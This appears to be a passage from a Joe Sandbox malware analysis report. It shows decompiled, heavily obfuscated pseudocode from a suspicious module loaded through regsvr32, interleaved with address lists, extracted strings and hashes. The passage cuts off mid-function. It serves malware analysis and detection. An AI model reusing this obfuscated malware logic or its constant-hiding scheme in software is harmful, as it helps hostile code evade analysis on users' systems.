											_v52 = 0xf74919;
											_v52 = _v52 + 0xee6e;
											_v52 = _v52 ^ 0x00f7306e;
											_t186 = E04F7BF19(_v60, _t217 + 0x20, _v56,  &_v36, _v52);
											_t221 =  &(_t221[3]);
											if(_t186 != 0) {
												_t164 = 0x26bfd;
												continue;
											}
										}
									}
								}
							}
						}
					}
					return _t218;
				}
				_t164 = 0x59bc1;
				goto L18;
			}

0x04f7f805
0x04f7f809
0x04f7f80a
0x04f7f80e
0x04f7f812
0x04f7f816
0x04f7f817
0x04f7f818
0x04f7f81d
0x04f7f820
0x04f7f828
0x04f7f82a
0x04f7f832
0x04f7f837
0x04f7f845
0x04f7f852
0x04f7fa73
0x04f7fa7d
0x04f7fa85
0x04f7fa8d
0x04f7fa95
0x04f7fa9a
0x04f7faa2
0x04f7faaa
0x04f7fab2
0x04f7fabd
0x04f7fac3
0x04f7facb
0x04f7fae0
0x04f7fae5
0x04f7fae8
0x04f7faea
0x04f7faf0
0x00000000
0x04f7faf0
0x04f7f858
0x04f7f85a
0x04f7f9f9
0x04f7fa05
0x04f7fa10
0x04f7fa15
0x04f7fa1d
0x04f7fa25
0x04f7fa2a
0x04f7fa32
0x04f7fa3a
0x04f7fa3f
0x04f7fa44
0x04f7fa59
0x04f7fa5e
0x04f7fa61
0x04f7fa63
0x04f7fa69
0x00000000
0x04f7fa69
0x04f7f860
0x04f7f865
0x04f7f96e
0x04f7f979
0x04f7f986
0x04f7f98e
0x04f7f996
0x04f7f99e
0x04f7f9a6
0x04f7f9ab
0x04f7f9b0
0x04f7f9b8
0x04f7f9c0
0x04f7f9c5
0x04f7f9cd
0x04f7f9e2
0x04f7f9e7
0x04f7f9ea
0x04f7f9ec
0x04f7f9f2
0x00000000
0x04f7f9f2
0x04f7f86b
0x04f7f870
0x04f7f911
0x04f7f919
0x04f7f91e
0x04f7f92a
0x04f7f932
0x04f7f93a
0x04f7f944
0x04f7f94c
0x04f7f954
0x04f7f95d
0x04f7f964
0x00000000
0x04f7f876
0x04f7f87b
0x04f7fb0c
0x04f7fb1c
0x04f7fb21
0x04f7fb27
0x04f7fb2c
0x04f7fb34
0x04f7fb3c
0x04f7fb44
0x04f7fb4c
0x04f7fb55
0x04f7fb58
0x04f7fb5f
0x04f7fb7f
0x04f7fb81
0x04f7f881
0x04f7f886
0x04f7faff
0x04f7faff
0x04f7fb04
0x00000000
0x00000000
0x04f7fb0a
0x04f7f88c
0x04f7f88c
0x04f7f898
0x04f7f8a3
0x04f7f8ab
0x04f7f8b3
0x04f7f8bb
0x04f7f8c3
0x04f7f8c8
0x04f7f8cd
0x04f7f8d5
0x04f7f8dd
0x04f7f8e5
0x04f7f8fa
0x04f7f8ff
0x04f7f904
0x04f7f90a
0x00000000
0x04f7f90a
0x04f7f904
0x04f7f886
0x04f7f87b
0x04f7f870
0x04f7f865
0x04f7f85a
0x04f7fb8d
0x04f7fb8d
0x04f7fafa
0x00000000

Strings

.OH, xrefs: 04F7FA32
ch, xrefs: 04F7F954
Pai, xrefs: 04F7FA05

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: .OH$Pai$ch
API String ID: 0-488785396
Opcode ID: bb53b888b70a6fa91b15165f537fc716cc2fa725953939bbda008ae5447441e2
Instruction ID: 2597b717886afc69e1eef83458985c48e42793959db93fbdc43b4f3bee4a5332
Opcode Fuzzy Hash: bb53b888b70a6fa91b15165f537fc716cc2fa725953939bbda008ae5447441e2
Instruction Fuzzy Hash: 159100B25083428BC314CF24E94945BBBE5BBD4758F100E2EF89196261D7B8DA4DCBE3

Uniqueness

Uniqueness Score: -1.00%

Function 04F732C5 Relevance: 3.9, Strings: 3, Instructions: 180
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E04F732C5(void* __edx, intOrPtr _a4) {
				char _v128;
				signed int _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				char _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				void* _t156;
				void* _t158;
				char _t165;
				void* _t166;
				void* _t169;
				signed int _t177;
				char* _t179;
				signed int _t186;
				intOrPtr _t197;
				signed int* _t202;

				_push(_a4);
				_t197 =  *0x4f82b0c; // 0x0
				_push(__edx);
				_push(_t197);
				E04F732C4(_t156);
				_v140 = 0x4080a;
				_t202 =  &(( &_v160)[3]);
				_v136 = 0x71265;
				_v132 = _v132 & 0x00000000;
				_t158 = 0x1ee1c;
				while(_t158 != 0xc7a0) {
					if(_t158 == 0x1ee1c) {
						_t158 = 0xc7a0;
						continue;
					}
					if(_t158 == 0x21b89) {
						__eflags = _v128;
						_t179 =  &_v128;
						if(_v128 == 0) {
							L16:
							_t158 = 0xd973d;
							continue;
						} else {
							goto L8;
						}
						do {
							L8:
							_t165 =  *_t179;
							__eflags = _t165 - 0x30;
							if(_t165 < 0x30) {
								L10:
								__eflags = _t165 - 0x61;
								if(_t165 < 0x61) {
									L12:
									__eflags = _t165 - 0x41;
									if(_t165 < 0x41) {
										L14:
										 *_t179 = 0x58;
										goto L15;
									}
									__eflags = _t165 - 0x5a;
									if(_t165 <= 0x5a) {
										goto L15;
									}
									goto L14;
								}
								__eflags = _t165 - 0x7a;
								if(_t165 <= 0x7a) {
									goto L15;
								}
								goto L12;
							}
							__eflags = _t165 - 0x39;
							if(_t165 <= 0x39) {
								goto L15;
							}
							goto L10;
							L15:
							_t179 = _t179 + 1;
							__eflags =  *_t179;
						} while ( *_t179 != 0);
						goto L16;
					}
					_t208 = _t158 - 0xd973d;
					if(_t158 != 0xd973d) {
						L19:
						__eflags = _t158 - 0x1beba;
						if(_t158 != 0x1beba) {
							continue;
						}
						return _t158;
					}
					_v160 = 0xb5b65c;
					_v160 = _v160 | 0x4beec9e5;
					_v160 = _v160 << 5;
					_v160 = _v160 >> 8;
					_v160 = _v160 ^ 0x0075579f;
					_v156 = 0x2c41e5;
					_v156 = _v156 + 0x8c5f;
					_v156 = _v156 + 0xffffd1e5;
					_v156 = _v156 ^ 0x002eaffe;
					_push(0x4f615dc);
					_t166 = E04F7B0A4(_v160, _v156);
					_v160 = 0xf75fbf;
					_v160 = _v160 >> 6;
					_v160 = _v160 + 0x6e26;
					_v160 = _v160 * 0x56;
					_v160 = _v160 ^ 0x017b8cd2;
					_v156 = 0xbc1e2d;
					_v156 = _v156 | 0xcdf7f3c7;
					_v156 = _v156 ^ 0xcdf44a0c;
					_t169 = E04F78D6C(_t208);
					_v152 = 0x144b1f;
					_v152 = _v152 * 0x5d;
					_v152 = _v152 + 0x27b7;
					_v152 = _v152 ^ 0x075efaec;
					_v156 = 0x1c0f19;
					_v156 = _v156 << 2;
					_v156 = _v156 ^ 0x4ae7977b;
					_v156 = _v156 ^ 0x4a904a4b;
					_v160 = 0xece672;
					_v160 = _v160 | 0x290fd08c;
					_v160 = _v160 ^ 0x70994582;
					_v160 = _v160 + 0xffffe446;
					_v160 = _v160 ^ 0x597cb7c0;
					_v148 = 0x2f1e78;
					_v148 = _v148 + 0xbec5;
					_v148 = _v148 ^ 0x0029a1b3;
					E04F6CE82(_t169, _t208, _t197, _v152,  &_v128, _v156, _v160,  &_v128, _v148);
					_v148 = 0x45c435;
					_v148 = _v148 | 0x97f2bc69;
					_v148 = _v148 ^ 0x97fcacd3;
					_v152 = 0x7c3ea8;
					_v152 = _v152 | 0x03be353c;
					_v152 = _v152 << 2;
					_t186 = 0x23;
					_v152 = _v152 * 0x47;
					_v152 = _v152 ^ 0x6e042531;
					_v156 = 0x8d5774;
					_v156 = _v156 * 0x23;
					_v156 = _v156 >> 3;
					_v156 = _v156 ^ 0x026abe57;
					_v160 = 0x7582ca;
					_v160 = _v160 + 0xffff4291;
					_v160 = _v160 / _t186;
					_v160 = _v160 + 0x49fc;
					_v160 = _v160 ^ 0x00059962;
					return E04F6845B(_v148, _v152, _v156, _v160, _t166);
				}
				_v160 = 0x9d42b6;
				_v160 = _v160 >> 2;
				_v160 = _v160 << 0xf;
				_v160 = _v160 ^ 0xa8568080;
				_v144 = _v160;
				_v156 = 0xc9776c;
				_t177 = 0x62;
				_v156 = _v156 * 0x3e;
				_v156 = _v156 << 1;
				_v156 = _v156 ^ 0x619af270;
				_v160 = 0xef825f;
				_v160 = _v160 / _t177;
				_v160 = _v160 | 0xfd8a9f6e;
				_v160 = _v160 + 0x68a5;
				_v160 = _v160 ^ 0xfd8581c2;
				_v152 = 0x68dd5b;
				_v152 = _v152 ^ 0x532a218b;
				_v152 = _v152 + 0xffff0ae0;
				_v152 = _v152 ^ 0x89a09699;
				_t151 =  &_v152;
				 *_t151 = _v152 ^ 0xdaee17ed;
				__eflags =  *_t151;
				E04F61CBA(_v156,  &_v144, _v160,  &_v128, _v152);
				_t202 =  &(_t202[3]);
				_t158 = 0x21b89;
				goto L19;
			}

0x04f732cf
0x04f732d6
0x04f732dc
0x04f732dd
0x04f732de
0x04f732e8
0x04f732f0
0x04f732f3
0x04f732fb
0x04f73300
0x04f7330c
0x04f73316
0x04f73553
0x00000000
0x04f73553
0x04f73321
0x04f7351e
0x04f73523
0x04f73527
0x04f7354c
0x04f7354c
0x00000000
0x00000000
0x00000000
0x00000000
0x04f73529
0x04f73529
0x04f73529
0x04f7352b
0x04f7352d
0x04f73533
0x04f73533
0x04f73535
0x04f7353b
0x04f7353b
0x04f7353d
0x04f73543
0x04f73543
0x00000000
0x04f73543
0x04f7353f
0x04f73541
0x00000000
0x00000000
0x00000000
0x04f73541
0x04f73537
0x04f73539
0x00000000
0x00000000
0x00000000
0x04f73539
0x04f7352f
0x04f73531
0x00000000
0x00000000
0x00000000
0x04f73546
0x04f73546
0x04f73547
0x04f73547
0x00000000
0x04f73529
0x04f73327
0x04f73329
0x04f73612
0x04f73612
0x04f73617
0x00000000
0x00000000
0x00000000
0x04f73617
0x04f7332f
0x04f73337
0x04f7333f
0x04f73344
0x04f73349
0x04f73351
0x04f73359
0x04f73361
0x04f73369
0x04f73379
0x04f7337e
0x04f73383
0x04f7338d
0x04f73392
0x04f733a0
0x04f733a4
0x04f733ac
0x04f733b4
0x04f733bc
0x04f733cc
0x04f733d1
0x04f733e0
0x04f733e8
0x04f733f0
0x04f733f8
0x04f73400
0x04f73405
0x04f7340d
0x04f73415
0x04f7341d
0x04f73425
0x04f7342d
0x04f73435
0x04f7343d
0x04f73445
0x04f7344d
0x04f7346a
0x04f7346f
0x04f73479
0x04f73481
0x04f73489
0x04f73491
0x04f73499
0x04f734a5
0x04f734a7
0x04f734ab
0x04f734b3
0x04f734c0
0x04f734c4
0x04f734c9
0x04f734d1
0x04f734d9
0x04f734e7
0x04f734eb
0x04f734f3
0x00000000
0x04f73510
0x04f7355a
0x04f73564
0x04f73569
0x04f7356e
0x04f7357a
0x04f7357e
0x04f7358d
0x04f7358e
0x04f73592
0x04f73596
0x04f7359e
0x04f735b0
0x04f735b8
0x04f735c0
0x04f735c8
0x04f735d0
0x04f735d8
0x04f735e0
0x04f735e8
0x04f735f0
0x04f735f0
0x04f735f0
0x04f73605
0x04f7360a
0x04f7360d
0x00000000

Strings

A,, xrefs: 04F73351
r, xrefs: 04F73415
&n, xrefs: 04F73392

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: &n$r$A,
API String ID: 0-1244511828
Opcode ID: ca3de3ae64ca51828d840609206c5c7d93c43d7e9e23a25ae5bb16e897ad870e
Instruction ID: a597d95a11f689b54c412cff7257ae06bd86d83426bd0a86ee07cc521e65583a
Opcode Fuzzy Hash: ca3de3ae64ca51828d840609206c5c7d93c43d7e9e23a25ae5bb16e897ad870e
Instruction Fuzzy Hash: C18137B1509382ABD358CF24D58995BBBE1BBD0B48F401D1DF8D296260C3B4DA4ECB93

Uniqueness

Uniqueness Score: -1.00%

Function 04F6E214 Relevance: 3.9, Strings: 3, Instructions: 173
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E04F6E214(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v556;
				intOrPtr _v572;
				char _v584;
				intOrPtr _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				void* _t132;
				void* _t134;
				signed int _t137;
				signed int _t139;
				signed int _t147;
				signed int _t156;
				signed int _t163;
				signed int _t164;
				signed int _t165;
				signed int _t166;
				signed int _t167;
				signed int _t172;
				intOrPtr _t187;
				signed int* _t191;

				_push(_a12);
				_t187 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(E04F7F23E);
				E04F732C4(_t132);
				_t188 = _v604;
				_t191 =  &(( &_v612)[5]);
				_v596 = 0x7fdc9;
				_t134 = 0x16c51;
				_v592 = 0x6e6c6;
				_v588 = 0xd8a9a;
				while(_t134 != 0x16c51) {
					if(_t134 == 0x66899) {
						_t137 = E04F7F23E(__eflags,  &_v556,  &_v584);
						asm("sbb eax, eax");
						_t139 =  ~_t137 & 0xfffcb201;
						L9:
						_t134 = _t139 + 0xa7b3b;
						continue;
					}
					if(_t134 == 0x72d3c) {
						_v600 = 0x272695;
						_t164 = 0x55;
						_v600 = _v600 / _t164;
						_v600 = _v600 ^ 0x000f4413;
						_v612 = 0x23187d;
						_t165 = 0x25;
						_v612 = _v612 / _t165;
						_t166 = 0x33;
						_v612 = _v612 / _t166;
						_v612 = _v612 ^ 0x000e3e7a;
						_v604 = 0xfdbb0a;
						_v604 = _v604 ^ 0xb8d8fd31;
						_v604 = _v604 ^ 0xb82c5c41;
						_t163 = _v600;
						_t147 = E04F7E36A(_t163, _t188,  &_v556, _v612, _v604);
						_t191 =  &(_t191[3]);
						L8:
						asm("sbb eax, eax");
						_t139 =  ~_t147 & 0xfffbed5e;
						goto L9;
					}
					if(_t134 == 0xa7b3b) {
						_v608 = 0x3b3c5a;
						_v608 = _v608 ^ 0x0a877ba3;
						_v608 = _v608 + 0xb4c4;
						_v608 = _v608 ^ 0x0ab19d7c;
						_v604 = 0xde7ecb;
						_v604 = _v604 | 0x0c9dd4b8;
						_v604 = _v604 ^ 0x0cd998cb;
						_v612 = 0xeb5d7e;
						_t117 =  &_v612; // 0xeb5d7e
						_t167 = 0x35;
						_v612 =  *_t117 / _t167;
						_v612 = _v612 ^ 0x69cb990d;
						_v612 = _v612 * 0x3e;
						_t127 =  &_v612;
						 *_t127 = _v612 ^ 0xa05b2654;
						__eflags =  *_t127;
						return E04F68B6C(_v608, _t188, _v604, _v612);
					}
					if(_t134 != 0xc710b) {
						if(_t134 != 0xe8cf1) {
							L15:
							__eflags = _t134 - 0x206b8;
							if(__eflags != 0) {
								continue;
							} else {
								return _t134;
							}
						} else {
							_v556 = 0x22c;
							_v604 = 0xbfd7b1;
							_t172 = 0x3a;
							_v604 = _v604 / _t172;
							_v604 = _v604 ^ 0x000840c5;
							_v612 = 0x17b66c;
							_v612 = _v612 | 0x7c3bde94;
							_v612 = _v612 + 0xffff52c6;
							_v612 = _v612 * 0x42;
							_v612 = _v612 ^ 0x0858c11c;
							_v608 = 0x436e35;
							_v608 = _v608 << 0x10;
							_v608 = _v608 | 0xe9de9188;
							_v608 = _v608 << 3;
							_v608 = _v608 ^ 0x7ff6ff3a;
							_v600 = 0x9bc4a7;
							_v600 = _v600 * 0x67;
							_v600 = _v600 ^ 0x3ea54115;
							_t163 = _v604;
							_t147 = E04F79D01(_t163, _v612, _v608, _t188, _v600,  &_v556);
							_t191 =  &(_t191[4]);
							goto L8;
						}
						L18:
						return _t156;
					}
					_v608 = 0xe1a260;
					_v608 = _v608 + 0xfffff8df;
					_v608 = _v608 >> 0xd;
					_v608 = _v608 ^ 0x0000070e;
					_v604 = 0x8b922b;
					_v604 = _v604 * 0x29;
					_v604 = _v604 ^ 0x1651e44f;
					_v612 = 0x5308ce;
					_v612 = _v612 | 0xd1c4c5de;
					_v612 = _v612 ^ 0x29cebd11;
					_v612 = _v612 ^ 0xf81480a6;
					_t156 = E04F79941(_v608);
					_t188 = _t156;
					_t163 = _t163;
					__eflags = _t156 - 0xffffffff;
					if(__eflags != 0) {
						_t134 = 0xe8cf1;
						continue;
					}
					goto L18;
				}
				_v572 = _t187;
				_t134 = 0xc710b;
				goto L15;
			}

0x04f6e21e
0x04f6e225
0x04f6e227
0x04f6e22e
0x04f6e235
0x04f6e236
0x04f6e23b
0x04f6e240
0x04f6e244
0x04f6e247
0x04f6e24f
0x04f6e254
0x04f6e261
0x04f6e26e
0x04f6e27e
0x04f6e471
0x04f6e478
0x04f6e47a
0x04f6e35c
0x04f6e35c
0x00000000
0x04f6e35c
0x04f6e289
0x04f6e3e2
0x04f6e3f2
0x04f6e3f7
0x04f6e3fd
0x04f6e405
0x04f6e411
0x04f6e416
0x04f6e420
0x04f6e425
0x04f6e42d
0x04f6e435
0x04f6e43d
0x04f6e445
0x04f6e455
0x04f6e45a
0x04f6e45f
0x04f6e353
0x04f6e355
0x04f6e357
0x00000000
0x04f6e357
0x04f6e291
0x04f6e497
0x04f6e4a1
0x04f6e4a9
0x04f6e4b1
0x04f6e4b9
0x04f6e4c1
0x04f6e4c9
0x04f6e4d1
0x04f6e4d9
0x04f6e4df
0x04f6e4e4
0x04f6e4e8
0x04f6e4f5
0x04f6e4f9
0x04f6e4f9
0x04f6e4f9
0x00000000
0x04f6e513
0x04f6e299
0x04f6e2a4
0x04f6e48a
0x04f6e48a
0x04f6e48f
0x00000000
0x00000000
0x00000000
0x00000000
0x04f6e2aa
0x04f6e2aa
0x04f6e2b4
0x04f6e2c2
0x04f6e2c5
0x04f6e2c9
0x04f6e2d1
0x04f6e2d9
0x04f6e2e1
0x04f6e2ee
0x04f6e2f2
0x04f6e2fa
0x04f6e302
0x04f6e307
0x04f6e30f
0x04f6e314
0x04f6e31c
0x04f6e329
0x04f6e331
0x04f6e347
0x04f6e34b
0x04f6e350
0x00000000
0x04f6e350
0x04f6e51e
0x04f6e51e
0x04f6e51e
0x04f6e363
0x04f6e36b
0x04f6e373
0x04f6e378
0x04f6e380
0x04f6e38e
0x04f6e392
0x04f6e39a
0x04f6e3a2
0x04f6e3aa
0x04f6e3b2
0x04f6e3c6
0x04f6e3cb
0x04f6e3ce
0x04f6e3cf
0x04f6e3d2
0x04f6e3d8
0x00000000
0x04f6e3d8
0x00000000
0x04f6e3d2
0x04f6e484
0x04f6e488
0x00000000

Strings

~], xrefs: 04F6E4D9
;{, xrefs: 04F6E25C
Z<;, xrefs: 04F6E497

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ;{$Z<;$~]
API String ID: 0-385127042
Opcode ID: f301794aadd9666e3ebf8e2d7b7637aad8fb8c97586ece25a3da9ed7084e0cd8
Instruction ID: c8ee0378476c95bd0590b81e68f8ae9425a53538c79eba912e20ec500add0e74
Opcode Fuzzy Hash: f301794aadd9666e3ebf8e2d7b7637aad8fb8c97586ece25a3da9ed7084e0cd8
Instruction Fuzzy Hash: B27145765083428BD318CF24D84941BBBE1FBC4748F108E1EF596A6260D7B5DA4ECB93

Uniqueness

Uniqueness Score: -1.00%

Function 04F6D8E0 Relevance: 3.9, Strings: 3, Instructions: 157
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E04F6D8E0(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				char _v548;
				void* _t171;
				void* _t174;
				void* _t182;
				signed int _t192;
				signed int _t193;
				signed int _t197;
				intOrPtr _t200;
				signed int _t218;

				_v24 = _v24 & 0x00000000;
				_v28 = 0x3c00b;
				_v8 = 0xb5da00;
				_v8 = _v8 * 0x1e;
				_v8 = _v8 ^ 0x154adff8;
				_v12 = 0x164feb;
				_v12 = _v12 ^ 0xfd17ebcc;
				_v12 = _v12 >> 9;
				_v12 = _v12 ^ 0x007a6fb2;
				_t200 =  *0x4f8221c; // 0x33fd420
				_t171 = E04F73E30(_v8, _t200 + 0x220, _v12);
				_v8 = 0x5927ba;
				_v8 = _v8 << 5;
				_v8 = _v8 + 0xffff8c21;
				_v8 = _v8 ^ 0x0b2ebfc7;
				_v12 = 0xc0a50a;
				_v12 = _v12 + 0x9b09;
				_v12 = _v12 >> 0xd;
				_t218 = 0x66;
				_v12 = _v12 / _t218;
				_t217 = _a4 + 0x2c;
				_v12 = _v12 ^ 0x000a2393;
				_t174 = E04F72460(_t171, _a4 + 0x2c, _v8, _v12);
				_t225 = _t174;
				if(_t174 != 0) {
					_v8 = 0x900d69;
					_t192 = 0x71;
					_v8 = _v8 / _t192;
					_t193 = 0x1b;
					_v8 = _v8 / _t193;
					_v8 = _v8 ^ 0x000311db;
					_v12 = 0xd235ce;
					_v12 = _v12 ^ 0x98fa1eb0;
					_v12 = _v12 >> 0xb;
					_v12 = _v12 << 0xd;
					_v12 = _v12 ^ 0x60ae2754;
					_a4 = 0xcbd3dd;
					_a4 = _a4 * 0x78;
					_a4 = _a4 ^ 0x920be626;
					_a4 = _a4 | 0x54b499c1;
					_a4 = _a4 ^ 0xddb4bb8a;
					_v16 = 0xc1fc38;
					_v16 = _v16 ^ 0xb7660086;
					_v16 = _v16 ^ 0xb7a7137d;
					_t182 = E04F7D6A7(_v8, _v12, _a4, 0x4f613ec, _v16);
					_v20 = 0x907cfc;
					_v20 = _v20 | 0xda511825;
					_v20 = _v20 ^ 0xdadc394a;
					_v12 = 0x126046;
					_v12 = _v12 * 0x28;
					_v12 = _v12 ^ 0x02dcb1f6;
					_a4 = 0xa82283;
					_a4 = _a4 ^ 0x1ff96aaf;
					_a4 = _a4 + 0x94ca;
					_a4 = _a4 ^ 0x1f5ca7ae;
					_v8 = 0x7ebd57;
					_v8 = _v8 + 0xffffa87d;
					_v8 = _v8 ^ 0x007cd10e;
					_v16 = 0xc5802;
					_v16 = _v16 + 0x2373;
					_v16 = _v16 ^ 0x000ca327;
					E04F736BB( *((intOrPtr*)(_a8 + 4)), _t225, _v12 * 0x28, _v12, _t217, _a4, _v8, _t182, _v16,  &_v548);
					_v8 = 0x4fd70c;
					_v8 = _v8 ^ 0xd01db6fe;
					_v8 = _v8 | 0xf70c3c67;
					_v8 = _v8 ^ 0xf75a7362;
					_a4 = 0x1ec9a9;
					_a4 = _a4 + 0xffff1857;
					_t197 = 0x61;
					_a4 = _a4 / _t197;
					_a4 = _a4 >> 5;
					_a4 = _a4 ^ 0x00081181;
					_v20 = 0x41d53b;
					_v20 = _v20 + 0xffff5848;
					_v20 = _v20 ^ 0x004edce8;
					_a8 = 0xb44430;
					_a8 = _a8 | 0xe7b7e24e;
					_a8 = _a8 ^ 0x0a3ef016;
					_a8 = _a8 ^ 0xed872276;
					E04F6845B(_v8, _a4, _v20, _a8, _t182);
					_a4 = 0x9d567d;
					_a4 = _a4 + 0x739e;
					_a4 = _a4 * 0x53;
					_a4 = _a4 ^ 0x33250d38;
					_a8 = 0x273931;
					_a8 = _a8 + 0xffff5d7d;
					_a8 = _a8 ^ 0x002c36ee;
					E04F758BD( &_v548, _a4, _a8);
				}
				return 1;
			}

0x04f6d8e9
0x04f6d8ed
0x04f6d8f4
0x04f6d901
0x04f6d904
0x04f6d90b
0x04f6d912
0x04f6d919
0x04f6d91d
0x04f6d927
0x04f6d936
0x04f6d93b
0x04f6d944
0x04f6d94a
0x04f6d951
0x04f6d958
0x04f6d95f
0x04f6d966
0x04f6d96f
0x04f6d975
0x04f6d978
0x04f6d97b
0x04f6d98a
0x04f6d992
0x04f6d994
0x04f6d99a
0x04f6d9a8
0x04f6d9ad
0x04f6d9b5
0x04f6d9b8
0x04f6d9bb
0x04f6d9c2
0x04f6d9c9
0x04f6d9d0
0x04f6d9d4
0x04f6d9d8
0x04f6d9df
0x04f6d9ea
0x04f6d9ed
0x04f6d9f4
0x04f6d9fb
0x04f6da02
0x04f6da09
0x04f6da10
0x04f6da28
0x04f6da2d
0x04f6da37
0x04f6da40
0x04f6da4d
0x04f6da5c
0x04f6da5f
0x04f6da66
0x04f6da6d
0x04f6da74
0x04f6da7b
0x04f6da82
0x04f6da89
0x04f6da90
0x04f6da97
0x04f6da9e
0x04f6daa5
0x04f6dac1
0x04f6dac6
0x04f6dacf
0x04f6dad6
0x04f6dadd
0x04f6dae4
0x04f6daeb
0x04f6daf7
0x04f6dafa
0x04f6dafd
0x04f6db01
0x04f6db08
0x04f6db0f
0x04f6db16
0x04f6db1d
0x04f6db24
0x04f6db2b
0x04f6db32
0x04f6db46
0x04f6db4b
0x04f6db58
0x04f6db63
0x04f6db66
0x04f6db6d
0x04f6db74
0x04f6db7b
0x04f6db88
0x04f6db8d
0x04f6db98

Strings

6,, xrefs: 04F6DB7B
8%3, xrefs: 04F6DB66
s#, xrefs: 04F6DA9E

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID: 8%3$s#$6,
API String ID: 4033686569-3201555562
Opcode ID: 8412e8096343ebb75f7136784c825ebca87300f237f9c7d7b72ca52c32693baa
Instruction ID: fcd156c4e170e7770e9ed38dc73c502186431df73a97556d87bd114de20e174b
Opcode Fuzzy Hash: 8412e8096343ebb75f7136784c825ebca87300f237f9c7d7b72ca52c32693baa
Instruction Fuzzy Hash: F181E375900208FBDB58DFA1D9899CEBFB1FF44354F20C199E815AA260D3B49B95DF80

Uniqueness

Uniqueness Score: -1.00%

Function 04F753D5 Relevance: 3.9, Strings: 3, Instructions: 153
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E04F753D5(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t130;
				void* _t132;
				void* _t144;
				signed int _t153;
				signed int _t155;
				signed int _t157;
				signed int _t158;
				void* _t175;
				signed int* _t178;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04F732C4(_t130);
				_t178 =  &(( &_v32)[5]);
				_v12 = 0x64d8a;
				_t175 = 0;
				_v8 = 0xe539b;
				_t132 = 0x824bc;
				do {
					while(_t132 != 0x67ad9) {
						if(_t132 == 0x824bc) {
							_t132 = 0x88615;
							continue;
						} else {
							if(_t132 == 0x88615) {
								_v12 = 0x7df870;
								_v12 = _v12 << 0xf;
								_v12 = _v12 ^ 0xfc380001;
								_v32 = 0x746b3d;
								_t69 =  &_v32; // 0x746b3d
								_t155 = 0x58;
								_v32 =  *_t69 / _t155;
								_v32 = _v32 << 0xd;
								_v32 = _v32 ^ 0x6a558000;
								_v16 = 0xbb2a8e;
								_v16 = _v16 + 0x2265;
								_v16 = _v16 ^ 0x00bcc1c0;
								_v28 = 0xea4df5;
								_v28 = _v28 << 7;
								_v28 = _v28 ^ 0x752646c1;
								_v24 = 0xc3b8c;
								_v24 = _v24 + 0xc451;
								_v24 = _v24 ^ 0x0008194e;
								_v20 = 0xa00d37;
								_v20 = _v20 | 0x2ad1ac9b;
								_v20 = _v20 ^ 0x2af68677;
								_t144 = E04F73FC9(0, _v32 | _v12,  &_v4, _a8, _v16, _v28, _a12, _v24, _v20);
								_t178 =  &(_t178[7]);
								__eflags = _t144;
								if(__eflags != 0) {
									_t132 = 0x67ad9;
									continue;
								}
							} else {
								if(_t132 != 0xd50df) {
									goto L13;
								} else {
									_v20 = 0xf333ba;
									_v20 = _v20 >> 1;
									_v20 = _v20 ^ 0x99997c8a;
									_v20 = _v20 ^ 0x99e0e556;
									_v16 = 0x2d9f0e;
									_t157 = 0x30;
									_v16 = _v16 / _t157;
									_v16 = _v16 ^ 0x4000f350;
									_v24 = 0xd41a23;
									_v24 = _v24 + 0xffffb2e5;
									_v24 = _v24 ^ 0x6c781380;
									_v24 = _v24 ^ 0x6ca32b27;
									_v12 = 0x3c6154;
									_v12 = _v12 >> 1;
									_v12 = _v12 ^ 0x001d6e78;
									_v32 = 0xb7a1a8;
									_v32 = _v32 ^ 0xadef657f;
									_v32 = _v32 ^ 0x58f1a4b9;
									_v32 = _v32 ^ 0xb2f87877;
									_v32 = _v32 ^ 0x475770b1;
									_v28 = 0x40f37;
